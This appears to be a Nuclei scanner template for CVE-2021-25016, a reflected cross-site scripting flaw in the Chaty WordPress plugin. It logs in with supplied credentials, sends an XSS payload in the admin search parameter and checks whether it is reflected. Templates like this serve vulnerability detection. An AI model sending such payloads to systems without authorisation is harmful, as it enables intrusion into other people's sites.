id: CVE-2021-25016

info:
  name: Chaty < 2.8.2 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
  remediation: Fixed in 2.8.3
  reference:
    - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25016
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25016
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.42987
    cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: premio
    product: chaty
    framework: wordpress
    publicwww-query: "/wp-content/plugins/chaty/"
  tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "search=</script><img src onerror=alert(document.domain)>"
          - "chaty_page_chaty"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100b7ded3d8884ebefdb576a66e3789ec59951d26bce15881134aa31d1a596e8b3202207aaa7e5290abcc041fcdcc678a9a5a86f5cb38f90d1a28b4caa1245f79003601:922c64590222798bb761d5b6d8e72950